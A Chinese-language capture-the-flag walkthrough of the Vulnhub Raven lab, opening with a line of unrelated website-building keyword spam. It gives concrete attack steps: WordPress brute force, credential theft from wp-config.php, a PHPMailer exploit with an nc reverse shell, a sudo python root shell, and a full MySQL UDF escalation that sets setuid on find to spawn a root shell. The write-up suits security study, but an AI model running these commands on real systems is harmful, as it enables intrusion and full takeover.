硅橡胶东莞网站建设,做映射后 内网无法通过域名访问网站,哈尔滨建站系统,wordpress 主题 排行该篇为Vulnhub系列靶机渗透#xff0c;本次靶机存在4个flag。下面开始我们今天的渗透之旅。Raven靶机有很多种思路#xff0c;我将对其进行一一整理。首先进行信息收集#xff0c;利用arp-scan和nmap#xff0c;进行靶机的ip及端口扫描发现了22、80、111端口。下面访问80端…该篇为Vulnhub系列靶机渗透本次靶机存在4个flag。下面开始我们今天的渗透之旅。Raven靶机有很多种思路我将对其进行一一整理。首先进行信息收集利用arp-scan和nmap进行靶机的ip及端口扫描发现了22、80、111端口。下面访问80端口在页面上一顿收集后发现在services处查看源代码发现了flag1。flag1{b9bbcb33e11b80be759c4e844862482d}下一步继续进行信息收集发现在blog处是一个wordpress的框架同时经过目录爆破发现了相关的路径这边的/vendor/目录为wordpress的默认目录下一步进行wordpress的信息枚举。发现了两个用户用户steven、michael利用kali自带的密码本进行爆破这里爆破时间特别长但是还是爆破出来了用户名steven 密码为pink84进行登录后在/var/www/目录下发现了flag2.接着在wordpress中进行信息收集存在wp-config.php文件该文件会存在一下配置的用户名和密码例如数据库。果不其然发现了数据库用户名和密码。利用用户名和密码登录后进行一番搜查发现了这两个用户。同时在表wp_posts中发现了flag3和flag4这就结束了还没有提权呢。就可以看到flag4flag3{afc01ab56b50591e7dccf93122770cd2}flag4{715dea6c055b9fe3337544932f2941ce}不行不能这么就结束下面退出数据库看看有没有什么提权方式尝试用sudo -l发现还真存在这边的steven用户存在一个不用输密码的All使用python即可称为root,这也太easy了直接sudo python -c import pty;pty.spawn(/bin/bash)清清爽爽的获取了root提权成功是不是以为完了~NONONO还有其他方法呢回过头来之前我们是爆破得到的密码而且我亲试时间特别久那么有没有其他的方法getshell呢在页面上一番搜索后发现了当初我们忽视的那个默认目录/vendor/,该目录下存在PATH,README,VERSION在PATH中发现了路径在README中发现了PHPmailer,在Version中发现了版本在本地漏洞库中查询查到了相应的exp然后将其复制到本地查看该怎么使用将对应的位置进行修改修改好之后python 40974.py,然后再本地开启监听nc -vlp 4567在浏览器里输入刚才的的后门文件名即可反弹shell这样就获得了个shell然后利用python进行改造变为交互式shell然后下面的操作就像之前那样了获取数据库用户名和密码但是在提权上换一种提权方式利用mysql的UDF提权。如果想用UDF提权有三个条件第一个为mysql root用户登录第二个mysql的版本在5.几第三个就是查看mysql底层是否允许udf提权输入show global variables like secure%;1当 secure_file_priv 的值为 NULL 表示限制 mysqld 不允许导入|导出此时无法提权2当 secure_file_priv 的值为 /tmp/ 表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下此时也无法提权3当 secure_file_priv 的值没有具体值时表示不对 mysqld 的导入|导出做限制此时可提权!如果是 MySQL 5.1 的版本必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。下面查看下是否在上面说到的目录下show variables like %plugin%;在kali本地漏洞库中查找udf的exp将1518.c复制到项目里编译然后开启web服务在shell里进入/tmp目录下进行下载然后再次编译一下生成个.so文件gcc -g -shared -o xiaoli.so 1518.o -lc-c 编译二进制-shared创建一个动态链接库输入文件可以是源文件、汇编文件或者目标文件。-o执行命令后的文件名-lc-l 库 c库名下一步进入mysql进到mysql的数据库show tables然后重新创建一个表我这里创建的xiaoli 接下来要给xiaoli的表中插入之前下载的xiaoli.so的恶意文件insert into xiaoli values(load_file(/tmp/xiaoli.so));显示插入成功 然后利用dumpfile函数把文件导出outfile 多行导出dumpfile一行导出outfile会有特殊的转换而dumpfile是原数据导出新建存储函数select * from xiaoli into dumpfile /usr/lib/mysql/plugin/xiaoli.so;创建自定义函数do_system类型是integer别名soname文件名字然后查询函数是否创建成功create function do_system returns integer soname xiaoli.so;查看以下创建的函数select * from mysql.func;创建成功 调用do_system函数来给find命令所有者的suid权限使其可以执行root命令select do_system(chmod us /usr/bin/find);执行find命令使用find执行 shelltouch xiaolifind xiaoli -exec /bin/sh \;或者find xiaoli -exec id \;cd /root 获取了root权限进到root目录下发现了flag4两种不同的getshell的方式两种不同提权的方式渗透需要灵活的思路需要想尽办法不断地尝试才会有意想不到的后果总体该靶机可玩性还是特别高的可以回顾mysql的提权巩固操作。每天学习一丢丢进步一丢丢~
